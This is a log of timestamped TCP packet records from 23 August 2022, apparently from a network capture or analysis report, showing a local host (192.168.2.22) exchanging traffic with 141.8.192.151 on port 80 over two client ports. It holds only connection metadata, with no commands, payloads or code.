Aug 23, 2022 13:42:48.865792036 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865798950 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865818024 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.865829945 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.865849018 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.926117897 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.926177979 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.926201105 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.926223993 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.926239967 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.926251888 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.926264048 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.926265955 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.926285982 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.926317930 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.926326990 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.926351070 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.926363945 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.926395893 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.926407099 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.926429033 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.926449060 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.926481962 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.926491976 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.926512003 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.926531076 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.926563025 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.926573038 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.926594019 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.926610947 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.926642895 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.926652908 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.926673889 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.926707029 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.926743031 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.926752090 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.926774979 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.926794052 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.926827908 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.926840067 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.926857948 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.926878929 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.926908970 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.926919937 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.926943064 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.926954985 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.926981926 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.926990986 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927015066 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927026987 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927054882 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927064896 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927088976 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927112103 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927139044 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927166939 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927192926 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927221060 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927252054 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927258015 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927277088 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927294016 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927321911 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927330017 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927361965 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927396059 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927423954 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927432060 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927454948 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927467108 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927495003 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927504063 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927530050 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927541018 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927567959 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927578926 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927602053 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927615881 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927643061 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927650928 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927671909 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927686930 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927712917 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927721977 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927747011 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927757978 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927787066 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927793026 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927818060 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927826881 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927854061 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927864075 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927887917 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927897930 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927927017 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927933931 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927957058 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.927968979 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.927999020 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928004026 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928033113 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928040028 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928066015 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928076029 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928105116 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928111076 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928133965 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928144932 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928172112 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928179979 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928200960 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928215027 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928244114 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928250074 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928273916 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928284883 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928312063 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928322077 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928344965 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928355932 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928385973 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928391933 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928416014 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928427935 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928457975 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928466082 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928489923 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928500891 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928529024 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928538084 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928563118 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928572893 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928603888 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928610086 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928634882 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928646088 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928674936 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928682089 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928704977 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928718090 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928746939 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928752899 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928776979 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928786039 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928812981 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.928822994 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.928845882 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.942612886 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.989171982 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989202023 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989233971 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989257097 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989280939 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989295006 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.989305973 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.989336014 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.989351034 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989373922 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989392042 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.989408970 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989414930 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.989440918 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989449978 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.989476919 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989485979 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.989512920 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989522934 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.989547968 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989557028 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.989586115 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989592075 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.989618063 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989626884 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.989653111 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989661932 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.989691973 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989697933 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.989727974 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989734888 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.989763975 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989769936 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.989799976 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989804983 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.989835024 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989840984 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.989871025 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989876986 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.989908934 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989914894 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.989943027 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.989953995 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989981890 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.989990950 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990015984 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990027905 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990056038 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990065098 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990088940 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990099907 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990127087 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990134954 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990164042 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990170956 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990200043 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990206003 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990232944 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990242004 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990271091 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990277052 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990305901 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990313053 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990355015 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990371943 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990401030 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990410089 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990434885 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990444899 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990473032 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990482092 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990508080 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990515947 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990541935 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990551949 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990576029 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990583897 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990611076 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990622044 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990644932 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990653992 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990680933 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990693092 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990706921 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990722895 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990751028 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990758896 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990787029 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990796089 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990823030 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990830898 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990855932 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990866899 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990895987 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990905046 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990931034 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.990942001 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990971088 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.990978956 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.991008043 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.991014004 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.991043091 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.991055965 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.991085052 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.991091967 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.991121054 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.991127968 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.991158009 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.991164923 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.991194010 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.991200924 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.991244078 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.991255999 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.991296053 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.991302967 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.991338968 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.991370916 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.991414070 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.991435051 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.991471052 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.991483927 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.991516113 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.991530895 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.991573095 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.991580963 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.991611958 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.991628885 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.991669893 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.991677999 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.991709948 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.991725922 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.991767883 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.991775990 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.991806030 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.991822958 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.991858959 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.991869926 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.991904974 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.991916895 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.991956949 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.991965055 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.991997004 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.992012024 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.992050886 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.992058039 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.992089033 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.992101908 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.992140055 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.341546059 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.401710987 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.401900053 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.403650045 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.463496923 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.464385033 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.464473009 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.464493990 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.464514017 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.464533091 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.464554071 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.464557886 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.464572906 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.464591026 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.464591980 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.464608908 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.464620113 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.464621067 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.464677095 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.524490118 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.524523973 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.524555922 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.524571896 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.524580002 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.524599075 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.524619102 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.524620056 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.524638891 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.524658918 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.524658918 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.524679899 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.524699926 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.524736881 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.524756908 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.524776936 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.524786949 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.524799109 CEST	80	49172	141.8.192.151	192.168.2.22
